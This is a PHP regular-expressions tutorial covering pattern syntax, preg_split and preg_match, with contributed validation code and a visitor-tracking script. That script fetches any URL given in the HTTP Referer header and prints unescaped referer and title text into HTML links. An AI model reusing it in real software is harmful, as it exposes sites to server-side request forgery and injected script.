Regular Expressions Tutorial
I have searched the web far and wide for a good tutorial on PHP regular
expressions and found a multitude of sites. However, I needed just a little
bit of information from each of them, and I ended up moving between ten
different web pages to get what I needed at any particular time. This
tutorial is a collation of all those bits of information. Some of this is my
own work, but it is mostly a collection of other tutorials available out
there. In order to give the authors credit for their work, I have included
ALL the links to those pages; if anyone feels this is an outrage, let me know
and I will take down the relevant information.
So here goes...
Basic Syntax of Regular Expressions (as from PHPBuilder.com)
First of all, let's take a look at two special symbols: '^' and '$'. What
they do is indicate the start and the end of a string, respectively, like
this:
"^The": matches any string that starts with "The";
"of despair$": matches a string that ends in the substring "of despair";
"^abc$": a string that starts and ends with "abc" -- that could only be "abc" itself!
"notice": a string that has the text "notice" in it.
You can see that if you don't use either of the two characters we mentioned,
as in the last example, you're saying that the pattern may occur anywhere
inside the string -- you're not "hooking" it to any of the edges.
There are also the symbols '*', '+', and '?', which denote the number of
times a character or a sequence of characters may occur. What they mean is:
"zero or more", "one or more", and "zero or one." Here are some examples:
"ab*": matches a string that has an a followed by zero or more b's ("a", "ab", "abbb", etc.);
"ab+": same, but there's at least one b ("ab", "abbb", etc.);
"ab?": there might be a b or not;
"a?b+$": a possible a followed by one or more b's ending a string.
You can also use bounds, which come inside braces and indicate ranges in the
number of occurrences:
"ab{2}": matches a string that has an a followed by exactly two b's ("abb");
"ab{2,}": there are at least two b's ("abb", "abbbb", etc.);
"ab{3,5}": from three to five b's ("abbb", "abbbb", or "abbbbb").
Note that you must always specify the first number of a range (i.e.,
"{0,2}", not "{,2}"). Also, as you might have noticed, the symbols '*', '+',
and '?' have the same effect as using the bounds "{0,}", "{1,}", and "{0,1}",
respectively.
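
Here is a small sketch of the anchors, quantifiers and bounds described so far, run through preg_match(). The '/' delimiters, the helper name matches() and the sample strings are my own assumptions for illustration; the text above was written with ereg() in mind and does not include this code.

```php
<?php
// Hypothetical helper for this sketch: true when $pattern matches $subject.
function matches(string $pattern, string $subject): bool
{
    return preg_match($pattern, $subject) === 1;
}

// Anchors: '^' pins the match to the start, '$' to the end.
var_dump(matches('/^The/', 'The end'));                // starts with "The"
var_dump(matches('/^The/', 'At The end'));             // "The" is not at the start
var_dump(matches('/of despair$/', 'full of despair')); // ends in "of despair"
var_dump(matches('/notice/', 'take notice now'));      // unanchored: anywhere

// Quantifiers and bounds, anchored at both ends so the whole string must fit.
var_dump(matches('/^ab*$/', 'a'));         // zero b's are allowed
var_dump(matches('/^ab+$/', 'a'));         // at least one b is required
var_dump(matches('/^ab?$/', 'abb'));       // at most one b
var_dump(matches('/^ab{2}$/', 'abb'));     // exactly two b's
var_dump(matches('/^ab{2,}$/', 'abbbb'));  // two or more b's
var_dump(matches('/^ab{3,5}$/', 'abb'));   // fewer than three b's
```

Anchoring the quantifier patterns at both ends is a deliberate choice here: without '^' and '$', "ab?" would happily match the first two characters of "abb" and hide the difference between the quantifiers.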
Now, to quantify a sequence of characters, put them inside parentheses:
"a(bc)*": matches a string that has an a followed by zero or more copies of the sequence "bc";
"a(bc){1,5}": one through five copies of "bc."
There's also the '|' symbol, which works as an OR operator:
"hi|hello": matches a string that has either "hi" or "hello" in it;
"(b|cd)ef": a string that has either "bef" or "cdef";
"(a|b)*c": a string that has a sequence of a's and b's, in any order and possibly empty, followed by a c;
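
A quick sketch of grouping and alternation with preg_match() follows. The sample strings and variable names are made up for illustration, and the '^' and '$' around the last pattern are my addition so that the whole string is tested.

```php
<?php
// "a(bc){1,5}": the bound applies to the whole parenthesized sequence.
preg_match('/a(bc){1,5}/', 'xabcbcbcx', $m);
$repeated = $m[0];
echo "repeated: $repeated\n";

// "(b|cd)ef": the parentheses limit how far the alternation reaches,
// and $m[1] records which branch was taken.
preg_match('/(b|cd)ef/', 'abcdefg', $m);
$whole  = $m[0];
$branch = $m[1];
echo "whole: $whole, branch: $branch\n";

// "(a|b)*c", anchored: any mix of a's and b's (even none), then a c.
$mixed   = preg_match('/^(a|b)*c$/', 'abbac');
$onlyC   = preg_match('/^(a|b)*c$/', 'c');
$invalid = preg_match('/^(a|b)*c$/', 'abdc');
```

Note that the a's and b's do not have to alternate: "abbac" is accepted, and so is a lone "c".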
A period ('.') stands for any single character:
"a.[0-9]": matches a string that has an a followed by one character and a digit;
"^.{3}$": a string with exactly 3 characters.
Bracket expressions specify which characters are allowed in a single
position of a string:
"[ab]": matches a string that has either an a or a b (that's the same as "a|b");
"[a-d]": a string that has lowercase letters 'a' through 'd' (that's equal to "a|b|c|d" and even "[abcd]");
"^[a-zA-Z]": a string that starts with a letter;
"[0-9]%": a string that has a single digit before a percent sign;
",[a-zA-Z0-9]$": a string that ends in a comma followed by an alphanumeric character.
You can also list which characters you DON'T want -- just use a '^' as the
first symbol in a bracket expression (i.e., "%[^a-zA-Z]%" matches a string
with a character that is not a letter between two percent signs).
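
The period and bracket expressions above can be tried out with a sketch like this one. The subject strings and variable names are assumptions of mine, chosen only to show one hit and one miss per idea.

```php
<?php
// "a.[0-9]": an a, any one character, then a digit.
$dot = preg_match('/a.[0-9]/', 'ax7');

// "^.{3}$": exactly three characters, so a four-character string fails.
$three = preg_match('/^.{3}$/', 'abcd');

// "[0-9]%": a single digit directly before a percent sign.
preg_match('/[0-9]%/', 'up 45% today', $m);
$digitPercent = $m[0];

// "%[^a-zA-Z]%": a leading '^' inside the brackets negates the set.
$nonLetter = preg_match('/%[^a-zA-Z]%/', '%7%');
$letter    = preg_match('/%[^a-zA-Z]%/', '%x%');

echo "$dot $three $digitPercent $nonLetter $letter\n";
```

The "[0-9]%" case is worth a second look: the bracket expression covers one position only, so out of "45%" just the "5%" is matched.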
To be taken literally, the characters "^.[$()|*+?{\" must be escaped with a
backslash ('\'), as they have special meaning. On top of that, you must
escape the backslash character itself in PHP3 strings, so, for instance, the
regular expression "(\$|)[0-9]+" would have the function call:
ereg("(\\$|)[0-9]+", $str)
(what string does that validate?)
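
As a hedged sketch of escaping in practice: ereg() was removed in PHP 7.0, so the example below uses preg_match() instead, together with preg_quote(), which does the backslash-escaping for you. The sample strings and variable names are made up, and the '^' and '$' anchors around the tutorial's pattern are my addition.

```php
<?php
// Made-up literal text that is full of metacharacters.
$literal = '$5.00 (approx.)';

// preg_quote() puts a backslash in front of every regex metacharacter;
// the second argument names the delimiter so it is escaped as well.
$escaped = preg_quote($literal, '/');
echo $escaped, "\n";

$found = preg_match('/' . $escaped . '/', 'Price: $5.00 (approx.) per unit');

// Unescaped, '.' stands for any character, so "5x00" slips through.
$loose  = preg_match('/5.00/', '5x00');
$strict = preg_match('/5\.00/', '5x00');

// The pattern from the text, anchored at both ends (my addition):
// an optional dollar sign followed by one or more digits.
$withDollar    = preg_match('/^(\$|)[0-9]+$/', '$42');
$withoutDollar = preg_match('/^(\$|)[0-9]+$/', '42');
$notANumber    = preg_match('/^(\$|)[0-9]+$/', '$');
```

Single-quoted PHP strings are used on purpose: they leave "\$" and "\." untouched, so there is no second layer of backslashes to think about.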
Example 1. Examples of valid patterns
* /<\/\w+>/
* |(\d{3})-\d+|Sm
* /^(?i)php[34]/
* {^\s+(\s+)?$}
Example 2. Examples of invalid patterns
* /href='(.*)' - missing ending delimiter
* /\w+\s*\w+/J - unknown modifier 'J'
* 1-\d3-\d3-\d4| - missing starting delimiter

Some useful PHP Keywords and their use (php.net man pages)
preg_split
(PHP 3 >= 3.0.9, PHP 4)
preg_split -- Split string by a regular expression
Description
array preg_split ( string pattern, string subject [, int limit [, int flags]])
Returns an array containing substrings of subject split along boundaries
matched by pattern.
If limit is specified, then only substrings up to limit are returned. A limit
of -1 means "no limit", which is useful when you only want to specify flags.
flags can be any combination of the following flags (combined with the
bitwise | operator):
PREG_SPLIT_NO_EMPTY
    If this flag is set, only non-empty pieces will be returned by
    preg_split().
PREG_SPLIT_DELIM_CAPTURE
    If this flag is set, parenthesized expressions in the delimiter pattern
    will be captured and returned as well. This flag was added in PHP 4.0.5.
PREG_SPLIT_OFFSET_CAPTURE
    If this flag is set, the string offset of every match is returned as
    well. Note that this changes the return value into an array where every
    element is an array consisting of the matched string at index 0 and its
    string offset into subject at index 1. This flag is available since
    PHP 4.3.0.
Example 1. preg_split() example: Get the parts of a search string
<?php
// split the phrase by any number of commas or space characters,
// which include " ", \r, \t, \n and \f
$keywords = preg_split("/[\s,]+/", "hypertext language, programming");
?>
Example 2. Splitting a string into component characters
<?php
$str = 'string';
$chars = preg_split('//', $str, -1, PREG_SPLIT_NO_EMPTY);
print_r($chars);
?>
Example 3. Splitting a string into matches and their offsets
<?php
$str = 'hypertext language programming';
$chars = preg_split('/ /', $str, -1, PREG_SPLIT_OFFSET_CAPTURE);
print_r($chars);
?>
will yield:
Array
(
    [0] => Array
        (
            [0] => hypertext
            [1] => 0
        )

    [1] => Array
        (
            [0] => language
            [1] => 10
        )

    [2] => Array
        (
            [0] => programming
            [1] => 19
        )

)
Note: Parameter flags was added in PHP 4 Beta 3.
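
The manual examples above do not show PREG_SPLIT_DELIM_CAPTURE or a positive limit, so here is a small sketch of both. The input strings and variable names are invented for illustration.

```php
<?php
// Split on '+' or '-'. Because the delimiter pattern is parenthesized and
// PREG_SPLIT_DELIM_CAPTURE is set, the operators are kept in the result.
$tokens = preg_split(
    '/([+-])/',
    '10+20-3',
    -1, // no limit, needed only so that flags can be passed
    PREG_SPLIT_DELIM_CAPTURE | PREG_SPLIT_NO_EMPTY
);
print_r($tokens);

// A limit of 2 stops after the first split; the rest stays in one piece.
$pair = preg_split('/\s*=\s*/', 'name = regex = fun', 2);
print_r($pair);
```

The first call returns the five pieces 10, +, 20, - and 3; the second returns "name" and "regex = fun".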
preg_match
(PHP 3 >= 3.0.9, PHP 4)
preg_match -- Perform a regular expression match
Description
int preg_match ( string pattern, string subject [, array matches [, int flags]])
Searches subject for a match to the regular expression given in pattern.
If matches is provided, then it is filled with the results of the search.
$matches[0] will contain the text that matched the full pattern, $matches[1]
will have the text that matched the first captured parenthesized subpattern,
and so on.
flags can be the following flag:
PREG_OFFSET_CAPTURE
    If this flag is set, the string offset of every match is returned as
    well. Note that this changes the return value into an array where every
    element is an array consisting of the matched string at index 0 and its
    string offset into subject at index 1. This flag is available since
    PHP 4.3.0.
The flags parameter is available since PHP 4.3.0.
preg_match() returns the number of times pattern matches. That will be either
0 times (no match) or 1 time, because preg_match() stops searching after the
first match. preg_match_all(), by contrast, continues until it reaches the
end of subject. preg_match() returns FALSE if an error occurred.
Tip: Do not use preg_match() if you only want to check whether one string is
contained in another string. Use strpos() or strstr() instead, as they will
be faster.
Example 1. Find the string of text "php"
<?php
// The "i" after the pattern delimiter indicates a case-insensitive search
if (preg_match("/php/i", "PHP is the web scripting language of choice.")) {
    print "A match was found.";
} else {
    print "A match was not found.";
}
?>
Example 2. Find the word "web"
<?php
/* The \b in the pattern indicates a word boundary, so only the distinct
 * word "web" is matched, and not a word partial like "webbing" or "cobweb" */
if (preg_match("/\bweb\b/i", "PHP is the web scripting language of choice.")) {
    print "A match was found.";
} else {
    print "A match was not found.";
}
if (preg_match("/\bweb\b/i", "PHP is the website scripting language of choice.")) {
    print "A match was found.";
} else {
    print "A match was not found.";
}
?>
Example 3. Getting the domain name out of a URL
<?php
// get host name from URL
preg_match("/^(http:\/\/)?([^\/]+)/i", "http://www.php.net/index.html", $matches);
$host = $matches[2];
// get last two segments of host name
preg_match("/[^\.\/]+\.[^\.\/]+$/", $host, $matches);
echo "domain name is: {$matches[0]}\n";
?>
This example will produce:
domain name is: php.net
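
Two points from the preg_match() description are not covered by the examples: the PREG_OFFSET_CAPTURE flag and the difference from preg_match_all(). The sketch below tries both, and also the strpos() alternative from the tip. The second sample sentence and the variable names are my own.

```php
<?php
$subject = 'PHP is the web scripting language of choice.';

// PREG_OFFSET_CAPTURE turns each entry of $matches into [text, offset].
preg_match('/\bweb\b/', $subject, $matches, PREG_OFFSET_CAPTURE);
[$text, $offset] = $matches[0];
echo "found '$text' at byte offset $offset\n";

// For a plain substring, strpos() gives the position without any regex.
$pos = strpos($subject, 'web');

// preg_match() stops at the first match; preg_match_all() keeps going
// and returns the total number of matches.
$first = preg_match('/\b\w+ing\b/', 'coding and testing');
$count = preg_match_all('/\b\w+ing\b/', 'coding and testing', $all);
print_r($all[0]);
```

strpos() returns 0 when the substring sits at the very start, so its result should be compared with `!== false` rather than used directly in an if.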
Perl Style Delimiters (as from crazygrrl.com)
When using Perl-style matching, the pattern also has to be enclosed by
special delimiters. The default is the forward slash, though you can use
others. For example:
/colou?r/
Usually you'll want to stick with the default, but if you need to use the
forward slash a lot in the actual pattern (especially if you're dealing with
pathnames) you might want to use something else:
!/root/home/random!
To make a match case-insensitive, all you need to do is append the option i
to the pattern:
/colou?r/i
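
To make the delimiter choice concrete, here is a minimal sketch comparing the two styles and the i option. The path and the test strings are assumptions for illustration only.

```php
<?php
$path = '/root/home/random/file.txt';

// With '/' as the delimiter, every slash in the pattern must be escaped.
$slashes = preg_match('/\/root\/home\/random/', $path);

// With '!' as the delimiter, the path can be written as it is.
$bang = preg_match('!/root/home/random!', $path);

// The i option after the closing delimiter makes the match case-insensitive.
$sensitive   = preg_match('/colou?r/', 'COLOR');
$insensitive = preg_match('/colou?r/i', 'COLOR');

echo "$slashes $bang $sensitive $insensitive\n";
```

Both path patterns match the same text; the '!' version is simply easier to read.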
Perl-style functions support these extra metacharacters (this is not a full
list):
\b  A word boundary, the spot between word (\w) and non-word (\W) characters.
\B  A non-word boundary.
\d  A single digit character.
\D  A single non-digit character.
\n  The newline character. (ASCII 10)
\r  The carriage return character. (ASCII 13)
\s  A single whitespace character.
\S  A single non-whitespace character.
\t  The tab character. (ASCII 9)
\w  A single word character - alphanumeric and underscore.
\W  A single non-word character.
Example:
/\bhomer\b/
Have a donut, Homer                 no match
A tale of homeric proportions!      no match
Do you think he can hit a homer?    match
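
The three sentences above can be checked with a short sketch. The loop and the extra \d, \s, \w pattern at the end (with its "Order 12 donuts" string) are my own additions for illustration.

```php
<?php
$sentences = [
    'Have a donut, Homer',              // capital H, and no i option
    'A tale of homeric proportions!',   // no word boundary after "homer"
    'Do you think he can hit a homer?', // a separate, lowercase word
];

$hits = [];
foreach ($sentences as $sentence) {
    $hits[] = preg_match('/\bhomer\b/', $sentence);
}
print_r($hits);

// \d, \s and \w together: a number, some whitespace, then a word.
preg_match('/(\d+)\s+(\w+)/', 'Order 12   donuts', $m);
echo "quantity: {$m[1]}, item: {$m[2]}\n";
```

The first sentence fails only because of case; with /\bhomer\b/i it would match.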

Corresponding to ereg() is preg_match(). Syntax:
preg_match(pattern (string), target (string), optional_array);
Example:
$pattern = "/\b(do(ugh)?nut)\b.*\b(Homer|Fred)\b/i";
$target = "Have a donut, Homer.";
if (preg_match($pattern, $target, $matches)) {
    print("Match: $matches[0]\n");
    print("Pastry: $matches[1]\n");
    print("Variant: $matches[2]\n");
    print("Name: $matches[3]\n");
} else {
    print("No match.");
}
Results:
Match: donut, Homer
Pastry: donut
Variant: [blank because there was no "ugh"]
Name: Homer
If you use the $target "Doughnut, Frederick?" there will be no match, since
there has to be a word boundary after Fred, but "Doughnut, fred?" will match
since we've specified it to be case-insensitive.
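
The claims about the other two targets can be verified with a sketch like this one. It reuses the pattern from the example; the loop and the $outcomes array are my own scaffolding.

```php
<?php
$pattern = '/\b(do(ugh)?nut)\b.*\b(Homer|Fred)\b/i';

$targets = [
    'Have a donut, Homer.',
    'Doughnut, Frederick?', // "Fred" runs straight into "erick"
    'Doughnut, fred?',      // lowercase is fine because of the i option
];

$outcomes = [];
foreach ($targets as $target) {
    $outcomes[$target] = preg_match($pattern, $target, $matches);
    if ($outcomes[$target] === 1) {
        // $matches[2] is an empty string when the optional "ugh" is absent.
        echo "$target => pastry '{$matches[1]}', variant '{$matches[2]}', ",
             "name '{$matches[3]}'\n";
    } else {
        echo "$target => no match\n";
    }
}
```

After the loop, $matches still holds the groups from the last target, which is why the variant there is "ugh" rather than blank.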
Contributed code which is applicable (and very useful!)
mkr at binarywerks dot dk
A (AFAIK) correct implementation of IPv4 validation. This one supports
optional ranges (CIDR notation); it validates numbers from 0-255 only in the
address part, and 1-32 only after the /
<?php
function valid_ipv4($ip_addr)
{
    // one address part: 0-255
    $num = "([0-9]|1?\d\d|2[0-4]\d|25[0-5])";
    // optional prefix length after the slash: 1-32
    $range = "([1-9]|1\d|2\d|3[0-2])";
    if (preg_match("/^$num\.$num\.$num\.$num(\/$range)?$/", $ip_addr)) {
        return 1;
    }
    return 0;
}

$ip_array[] = "127.0.0.1";
$ip_array[] = "127.0.0.256";
$ip_array[] = "127.0.0.1/36";
$ip_array[] = "127.0.0.1/1";
foreach ($ip_array as $ip_addr) {
    if (valid_ipv4($ip_addr)) {
        echo "$ip_addr is valid \n";
    } else {
        echo "$ip_addr is NOT valid \n";
    }
}
?>
plenque at hotmail dot com
I wrote a function that checks if a given regular expression is valid. I
think some of you might find it useful. It changes the error_handler and
restores it; I didn't find any other way to do it.
<?php
function IsRegExp($sREGEXP)
{
    // Route any warning raised by an invalid pattern to TrapError().
    $sPREVIOUSHANDLER = set_error_handler("TrapError");
    preg_match($sREGEXP, "");
    // restore_error_handler() takes no arguments
    restore_error_handler();
    return !TrapError();
}

function TrapError()
{
    static $iERRORES;
    if (!func_num_args()) {
        // Called by IsRegExp(): report the error count and reset it.
        $iRETORNO = $iERRORES;
        $iERRORES = 0;
        return $iRETORNO;
    } else {
        // Called by PHP as the error handler: count the error.
        $iERRORES++;
    }
}
?>
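PHP Get_title tag code which uses simple regex and nice php string functions
(As from Zend PHP)
<?php
function get_title_tag($chaine)
{
    $fp = fopen($chaine, 'r');
    if (!$fp) {
        return false;
    }
    $contenu = '';
    while (!feof($fp)) {
        $contenu .= fgets($fp, 1024);
        // stop reading once the closing title tag has been seen
        if (stristr($contenu, '</title>')) {
            break;
        }
    }
    fclose($fp);
    // The original eregi() pattern did not survive on this page; this
    // preg_match() pattern is an assumed equivalent (eregi() was removed
    // in PHP 7.0).
    if (preg_match('/<title>(.*)<\/title>/is', $contenu, $out)) {
        return $out[1];
    } else {
        return false;
    }
}
?>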
My Own 'Visitor Trac' code which uses regex XML parsing methods
<?php
// Referring page (may be absent) and a per-visitor log file named after the IP.
$referer = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : '';
$filename = $_SERVER['REMOTE_ADDR'] . '.txt';
//print_r($_SERVER);

// Start a fresh log if the existing one is more than 7 days old.
if (file_exists($filename)) {
    $lastvisit = filectime($filename);
    $currentdate = date('U');
    $difference = round(($currentdate - $lastvisit) / 86400); // 86400 seconds per day
    if ($difference > 7) {
        unlink($filename);
    }
}
$fp = fopen($filename, "a");

if (!$referer) $url_test = 'http://dinki.mine.nu/weblog/';
else $url_test = $referer;
$new_title = return_title($url_test);
//print $new_title;

// Each visit is stored as two "<beg>"-prefixed records: the URL, then the title.
$new_name = stripslashes("<beg>$new_title\n");
$new_URL = stripslashes("<beg>$referer\n");
fwrite($fp, $new_URL);
fwrite($fp, $new_name);
fclose($fp);

// Read the log back and split it into records; $foo[0] is the empty
// string in front of the first "<beg>".
$file = implode('', file($filename));
$foo = preg_split("/<beg>/", $file);
$number = count($foo);
//print $number;

if ($number > 11) {
    // More than five visits: show the last five and rewrite the log with them.
    $fp = fopen($filename, "w");
    $count = $number - 10;
    while ($count < $number) {
        $print1 = $foo[$count];
        $print2 = $foo[$count + 1];
        print " <img src = arrow.gif> ";
        print "<a href=$print1>$print2</a>"; //print $count;
        $count += 2;
        $new_name = stripslashes("<beg>$print2");
        $new_URL = stripslashes("<beg>$print1");
        fwrite($fp, $new_URL);
        fwrite($fp, $new_name);
    }
    fclose($fp);
    //print_r($foo);
} else {
    $count = 1;
    while ($count < $number) {
        $print1 = $foo[$count];
        $print2 = $foo[$count + 1];
        print " <img src = arrow.gif> ";
        print "<a href=$print1>$print2</a>"; //print $count;
        $count += 2;
    }
}

// Fetch a page and return the text of its <title> element ('' if none is found).
function return_title($url)
{
    $title = '';
    $array = file($url);
    if ($array === false) {
        return $title;
    }
    for ($i = 0; $i < count($array); $i++) {
        if (preg_match("/<title>(.*)<\/title>/i", $array[$i], $tag_contents)) {
            $title = $tag_contents[1];
            $title = strip_tags($title);
            break;
        }
    }
    return $title;
}
?>
Good online articles as reference or extra reading
O'Reilly Pocket Reference - PHP Regular Expressions
A very nice article on PHP Regular Expressions from DevArticle.com
A good run down of PHP-Regular expressions with emphasis on code
Regular Expression Creator and Editor from the makers of PHPEdit
Regular Expressions Library (with over 430 expressions and growing!!)